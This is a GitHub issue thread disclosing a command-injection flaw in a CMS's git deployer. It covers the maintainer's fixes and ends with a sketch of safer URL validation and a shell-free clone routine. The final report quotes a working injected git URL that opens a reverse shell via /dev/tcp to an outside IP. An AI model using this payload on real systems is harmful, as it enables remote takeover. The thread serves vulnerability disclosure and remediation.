remote code execution vulnerability #326
Comments
|
Thank you for this report. I will make sure to parse the url and throw an exception if it fails. |
|
Maybe you should check if there is a single quote in the git url, since in order to execute another bash command I need to put a single quote to close the one put in the exec line. If I use a real git url + a single-quoted bash command, the git command will not raise any error. |
|
Alright, I will do that too |
|
@ufo009e the latest changes should stop this exploit now. Can you still reproduce it? |
|
The saved repo in the db always has https:// removed, so your validate function always fails with 'Malformed repo URL' now. And you need to check username and password as well, since those are a part of the git url. async pullRepo() { |
|
Alright, I've put to use the WHATWG and Node url parsers now to clean that part up too. Still able to break it? |
|
I always get "URL is not defined" when I click media, even with the connection below (no malicious command at all). Is that expected? But from your code I think I couldn't exploit this any more { |
|
If you're getting "URL is not defined", it probably means you're running an older node.js version, as that variable refers to the standard WHATWG URL object, which wasn't available in older versions. I'll update the dependency descriptions in the README to reflect that. Other than that, I'll close this issue, since I can't perform the exploit anymore either. Thank you for your help! |
In file src/Server/Entity/Deployer/GitDeployer.js: await HashBrown.Service.AppService.exec('git clone \'' + url + '\' \'' + repoPath + '\'');
The url, username, password and other parameters accept values without a proper security check. If I set the git url to something like "10.154.159.166/git' $(bash -c 'bash -i >& /dev/tcp/10.154.159.161/8888 0>&1' &)", then when I click media to trigger gitpull I can get a reverse shell.
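The fix discussed in this thread (parse the URL, check the credentials too, stop relying on quoting), sketched as an added example that is not HashBrown's own code. The names `buildRemoteUrl`, `cloneArgs` and `cloneRepo`, the protocol allowlist and the host `git.example.test` are assumptions made for illustration.

```javascript
// Added example, not the project's code. Requires a Node.js version with the global WHATWG URL.
const ALLOWED_PROTOCOLS = new Set(['https:', 'ssh:']); // assumed allowlist

// Validate a user-supplied repo location plus optional credentials.
// Returns a normalised URL string, or throws on anything suspicious.
function buildRemoteUrl(repo, username = '', password = '') {
    // The thread notes the stored value has "https://" stripped, so default the scheme.
    const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(repo);
    const url = new URL(hasScheme ? repo : 'https://' + repo); // throws on malformed input

    if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
        throw new Error('Unsupported protocol: ' + url.protocol);
    }
    // Credentials are part of the final URL, so they go through the same parser.
    if (username) url.username = username;
    if (password) url.password = password;

    // Parsing alone is not validation: the URL parser leaves characters such as
    // ' $ ( ) unescaped in paths and userinfo, so reject them explicitly.
    const remote = url.href;
    if (/[\s'"`$;&|<>\\(){}]/.test(remote)) {
        throw new Error('Malformed repo URL');
    }
    return remote;
}

// Argument vector for git; "--" stops git from reading a value as an option.
function cloneArgs(remoteUrl, repoPath) {
    return ['clone', '--', remoteUrl, repoPath];
}

// Run git directly with an argument array: no shell, so no quote to break out of.
async function cloneRepo(repo, username, password, repoPath) {
    const { execFile } = await import('node:child_process');
    const { promisify } = await import('node:util');
    const args = cloneArgs(buildRemoteUrl(repo, username, password), repoPath);
    return promisify(execFile)('git', args);
}
```
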